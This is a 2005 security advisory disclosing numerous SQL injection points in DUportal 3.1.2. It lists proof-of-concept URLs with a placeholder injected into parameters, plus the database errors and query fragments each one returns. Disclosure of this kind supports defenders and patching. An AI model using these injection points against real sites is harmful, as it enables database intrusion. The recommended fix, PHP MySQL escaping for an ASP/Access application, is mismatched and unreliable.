|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Wednesday, 20 April 2005 16:43 |
 Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: Very High
Title: DUportal 3.1.2 and DUportal 3.1.2 SQL have many sql injection vulnerabilities.
Date: 20/04/2005
Vendor: DUware
Vendor Website: http://www.duware.com
Summary: There are, many sql injections on duportal 3.1.2 and duportal 3.1.2 SQL
Proof of Concept Exploits:
http://localhost/test_DUportal/home/../home/channel.asp?iChannel="SQL_INJECTION&nChannel=Articles
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "CAT_CHANNEL = CHA_ID AND CAT_CHANNEL = ""SQL_INJECTION".
/test_DUportal/includes/inc_channel.asp, line 44
http://localhost/test_DUportal/home/detail.asp?iData="SQL_INJECTION&iCat=221&iChannel=7&nChannel=Ads
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "DAT_ID = ""SQL_INJECTION".
/test_DUportal/includes/inc_detail.asp, line 39
http://localhost/test_DUportal/home/detail.asp?iData=136&iCat="SQL_INJECTION&iChannel=7&nChannel=Ads
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ""SQL_INJECTION AND DAT_ID <> 136 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()".
/test_DUportal/includes/inc_detail_related.asp, line 44
http://localhost/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT="SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression "DAT_ID = "SQL_INJECTION".
/test_DUportal/includes/inc_poll_voting.asp, line 47
http://localhost/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData="SQL_INJECTION&nChannel=Products&iRate=5
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "DAT_ID = ""SQL_INJECTION".
/test_DUportal/includes/inc_rating.asp, line 47
http://localhost/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate="SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "DAT_RATED + ""SQL_INJECTION".
/test_DUportal/includes/inc_rating.asp, line 47
http://localhost/test_DUportal/home/detail.asp?iData=86&iCat="SQL_INJECTION&iChannel=8&nChannel=Products
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ""SQL_INJECTION AND DAT_ID <> 86 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()".
/test_DUportal/includes/inc_detail_related.asp, line 44
http://localhost/test_DUportal/home/channel.asp?iChannel="SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "CAT_CHANNEL = CHA_ID AND CAT_CHANNEL = ""SQL_INJECTION".
/test_DUportal/includes/inc_channel.asp, line 44
http://localhost/test_DUportal/home/detail.asp?iData="SQL_INJECTION&iCat=248&iChannel=6&nChannel=Events
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "DAT_ID = ""SQL_INJECTION".
/test_DUportal/includes/inc_detail.asp, line 39
http://localhost/test_DUportal/home/detail.asp?iData=10&iCat="SQL_INJECTION&iChannel=1&nChannel=News
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "CAT_CHANNEL = CHA_ID AND DAT_CATEGORY = CAT_ID AND CHA_ACTIVE = 1 AND DAT_CATEGORY = ""SQL_INJECTION AND DAT_ID <> 10 AND DAT_APPROVED=1 AND DAT_EXPIRED > DATE()".
/test_DUportal/includes/inc_detail_related.asp, line 44
http://localhost/test_DUportal/home/search.asp?keyword=dcrab&iChannel="SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression "DAT_CATEGORY = CAT_ID AND CHA_ID = CAT_CHANNEL AND CHA_ID = "SQL_INJECTION AND (DAT_NAME LIKE "%dcrab%" OR DAT_DESCRIPTION LIKE "%dcrab%") AND DAT_APPROVED = 1 AND CHA_ACTIVE=1 AND DAT_EXPIRED > DATE() AND DAT_PARENT=0 ORDER BY CHA_MENU, CAT_NAME, DAT_NAME".
/test_DUportal/includes/inc_result.asp, line 53
http://localhost/test_DUportal/home/type.asp?iCat="SQL_INJECTION&iChannel=8&nChannel=Products
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression "DAT_CATEGORY = CAT_ID AND CAT_CHANNEL = CHA_ID AND DAT_APPROVED=1 AND CHA_ACTIVE=1 AND DAT_EXPIRED > DATE() AND DAT_CATEGORY = ""SQL_INJECTION".
/test_DUportal/includes/inc_type.asp, line 41
Possible Fixes: The usage of mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
|
